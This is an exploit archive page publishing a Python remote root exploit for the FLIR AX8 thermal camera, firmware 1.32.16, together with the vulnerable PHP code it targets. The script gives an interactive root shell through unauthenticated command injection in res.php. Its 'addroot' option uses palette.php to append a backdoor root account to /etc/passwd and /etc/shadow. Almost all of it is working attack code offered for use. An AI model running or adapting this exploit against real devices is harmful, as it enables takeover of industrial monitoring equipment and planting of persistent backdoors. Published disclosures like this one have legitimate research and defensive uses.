exploit the possibilities

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root
Posted Oct 15, 2018
Authored by LiquidWorm | Site zeroscience.mk

The FLIR AX8 thermal sensor camera version 1.32.16 suffers from two unauthenticated command injection vulnerabilities. The issues can be triggered when calling multiple unsanitized HTTP GET/POST parameters within the shell_exec function in res.php and palette.php file. This can be exploited to inject arbitrary system commands and gain root remote code execution.

tags | exploit, remote, web, arbitrary, root, php, vulnerability, code execution
MD5 | d06114bdae6c5e38a699adb6567a8ba2

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16
# 1.17.13
# OS: neco_v1.8-0-g7ffe5b3
# Hardware: Flir Systems Neco Board
#
# Summary: Thermal Imaging Camera For Continuous Condition and Safety
# Monitoring FLIR AX8 is a thermal sensor with imaging capabilities.
# Combining thermal and visual cameras in a small, affordable package,
# the AX8 provides continuous temperature monitoring and alarming capabilities
# to protec critical electrical and mechanical equipment. The AX8 helps
# you guard against unplanned outages, service interruptions, and equipment
# failure.
#
# The FLIR AX series camera/sensor also has built-in support to connect to
# industrial control equipment such as programmable logic controllers (PLCs),
# and allows the sharing of analysis and alarm results and simple control
# using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy
# to install, the AX8 provides continuous monitoring of electrical cabinets,
# process and manufacturing areas, data centers, energy generation and distribution,
# transportation and mass transit, storage facilities and refrigeration warehouses.
#
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
#
# =============================================================================
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2. if (isset($_POST["action"])) {
# 3. switch ($_POST["action"]) {
# 4. case "get":
# 5. if(isset($_POST["resource"]))
# 6. {
# 7. switch ($_POST["resource"]) {
# 8. case ".rtp.hflip":
# 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10. $result = "false";
# 11. break;
# 12. }
# 13. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14. break;
# 15. case ".rtp.vflip":
# 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17. $result = "false";
# 18. break;
# 19. }
# 20. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21. break;
# 22. default:
# 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24. }
# 25. }
#
# =============================================================================
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2. if(isset($_POST["palette"])){
# 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4. echo json_encode(array("success"));
# 5. }
# 6. ?>
#
# =============================================================================
#
#
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
# lighttpd/1.4.33
# PHP/5.4.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
#
#
# 26.07.2018
#

import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
sys.exit()

bannah = """
.---------------------------------.
| 1984 Pictures |
| |
| presents |
| ___ |
| [| |=|{)__ |
| |___| \/ ) |
| /|\ /| |
| / | \ | \\ |
.---------------------------------.
"""
print bannah
time.sleep(4)
os.system('clear')

print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'

ICU = '''
````````
`./+ooosoooooo+/.`
`.+ss+//:::::::://+ss+.`
-oyo/::::-------:::::/oyo-
`/yo+:::-------.------:::+oy/`
`+yo+::---...........----:/+oy+`
`/yo++/--...../+oo+:....---:/+oy/`
`ss++//:-.../yhhhhhhy/...-://++ss`
.ho++/::--.-yhhddddhhy-.--:://+oh.
.ho+//::---/mmmmmmmmmm:---::/++oh.
`ss++//::---+mNNNNNNm+---:://++ss`
`/yo+//:::----+syys+-----://++oy/`
`+yo++//:::-----------:://++oy+`
`/yo++///:::::-:::::://+++oy/`
.oyo+++////////////+++oyo.
`.+ssoo++++++++++ooss+.`
`./+osssssssso+/.`
````````
'''

colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]

print(''.join(colored_chars))

print
print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'

print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'

while True:

zeTargets = 'http://'+sys.argv[1]+'/res.php'
zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
zeHeaders = {'Cache-Control' : 'max-age=0',
'User-Agent' : 'thricer/251.4ev4h',
'Accept' : 'text/html,application/xhtml+xml',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'close',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'action' : 'get',
'resource' : ';'+zeCommand}

try:

zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
print json.loads(zeRequest.text)

if zeCommand.strip() == 'exit':
sys.exit()

if zeCommand.strip() == 'addroot':
print '[+] Blind command injection using palette.php...'
print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'

nuTargets = 'http://'+sys.argv[1]+'/palette.php'
nuHeaders = zeHeaders

nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
'\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
'\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
'\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
'\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
'\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
'\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
'\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
'\\x3a\\x3a\\x0a\\x0d')

nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}

requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
time.sleep(2)
requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)

print '[*] Success!\n'
else: pass

except Exception:
print '[*] Error!'
break

sys.exit()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close